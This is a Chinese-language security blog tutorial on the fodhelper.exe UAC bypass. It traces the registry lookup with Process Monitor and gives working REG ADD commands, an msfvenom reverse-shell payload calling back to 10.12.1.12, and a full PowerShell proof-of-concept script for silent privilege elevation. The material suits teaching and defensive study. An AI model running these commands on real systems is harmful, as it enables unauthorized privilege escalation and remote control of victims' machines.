Bypass UAC Fodhelper

Bypass UAC fodhelper.exe

1
sigcheck.exe -m C:\Windows\System32\fodhelper.exe

输出:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly
   xmlns="urn:schemas-microsoft-com:asm.v1"
   xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"
   manifestVersion="1.0">
 <assemblyIdentity type="win32" publicKeyToken="6595b64144ccf1df" name="Microsoft.Windows.FodHelper" version="5.1.0.0" processorArchitecture="amd64"/>
 <description>Features On Demand Helper UI</description>
 <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
  <security>
      <requestedPrivileges>
          <requestedExecutionLevel
            level="requireAdministrator"
          />
      </requestedPrivileges>
  </security>
 </trustInfo>
 <asmv3:application>
    <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
        <dpiAware>true</dpiAware>
        <autoElevate>true</autoElevate>
    </asmv3:windowsSettings>
 </asmv3:application>
</assembly>

可以发现该应用程序是由管理用户运行的,因此需要使用完整的 administrator 访问令牌

1
2
3
4
5
<requestedPrivileges>
    <requestedExecutionLevel
    level="requireAdministrator"
    />
</requestedPrivileges>

level='requireAdministrator': The application runs using administrator permissions. The user who starts the application must be a member of the Administrators group. If the opening process isn’t running with administrative permissions, the system prompts for credentials.


此外,autoelevate 标志被设置为 true,这允许可执行文件自动提升到高完整性,而不提示管理员用户是否同意

1
<autoElevate>true</autoElevate>

Process Monitor Filter:

  • Process Name is fodhelper.exe
  • Operation contains Reg
  • Result is NAME NOT FOUND
  • Path contains HKCU

有如下条目:

1
HKCU\Software\Classes\ms-settings\Shell\Open\Command    NAME NOT FOUND

fodhelper.exe 应用程序试图查询 HKCU:\Software\Classes\ms-settings\shell\open\command 注册表键,但它返回 NAME NOT FOUND

修改查询路径和规则以查看更多信息

Close :

  • Path contains HKCU
  • Result is NAME NOT FOUND

有如下条目:

1
2
HKCU\Software\Classes\ms-settings\Shell\Open\Command    NAME NOT FOUND
HKCR\ms-settings\Shell\Open\Command                     SUCCESS

在 HKCU 中未找到 ms-settings\shell\open\command 注册表键后,会立即访问 HKCR 中的相同表键

Not Found


查看 HKEY_CLASSES_ROOT\ms-settings\Shell\Open\Command 内的键值:

1
2
(default)          REG_SZ    (value not set)
DelegateExecute    REG_SZ    {xxxx-xxxx-xxxx-xxxx-xxxxxx}

现在,可以通过在 HKCU 中创建这个丢失的表项,以劫持它获得高级别的权限

1
2
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ

创建完成,再次运行 Process Monitor 查看输出

1
2
HKCU\Software\Classes\ms-settings\Shell\Open\command                    SUCCESS
HKCU\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute    SUCCESS

添加恶意值

1
2
3
4
5
6
7
8
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f

# QUERY Value
REG QUERY HKCU\Software\Classes\ms-settings\Shell\Open\command

# HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command
#     (Default)    REG_SZ    cmd.exe
#     DelegateExecute    REG_SZ

检查当前用户权限

1
2
3
4
5
6
7
8
9
10
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

运行 fodhelper.exe

1
Start-Process -FilePath C:\Windows\System32\fodhelper.exe

弹出 cmd 检查用户权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Disabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

Reverse High Mandatory Level Shell

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.12.1.12 LPORT=4444 -f exe -o callme.exe

添加值

1
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Users\Public\Documents\callme.exe" /f

删除创建的项值

1
REG DELETE HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell /f

使用 Powershell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<#
.SYNOPSIS  
    This script is a proof of concept to bypass the User Access Control (UAC) via fodhelper.exe
    It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform an UAC bypass to start any application. 
    
    ATTENTION: Do not try this on your productive machine! 
.NOTES  
    Function   : FodhelperBypass
    File Name  : FodhelperBypass.ps1 
    Author     : Christian B. - winscripting.blog 
.LINK  
    https://github.com/winscripting/UAC-bypass
.EXAMPLE  
     Load "cmd.exe /c powershell.exe" (it's default):
     FodhelperBypass 
     Load specific application:
     FodhelperBypass -program "cmd.exe"
     FodhelperBypass -program "cmd.exe /c powershell.exe"
     
#>

function FodhelperBypass()
{ 
    Param (          
        [String]$program = "cmd /c start powershell.exe" #default
    )

    #Create registry structure
    New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
    New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
    Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force

    #Perform the bypass
    Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

    #Remove registry structure
    Start-Sleep 3
    Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

}
信息安全
BypassUAC

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!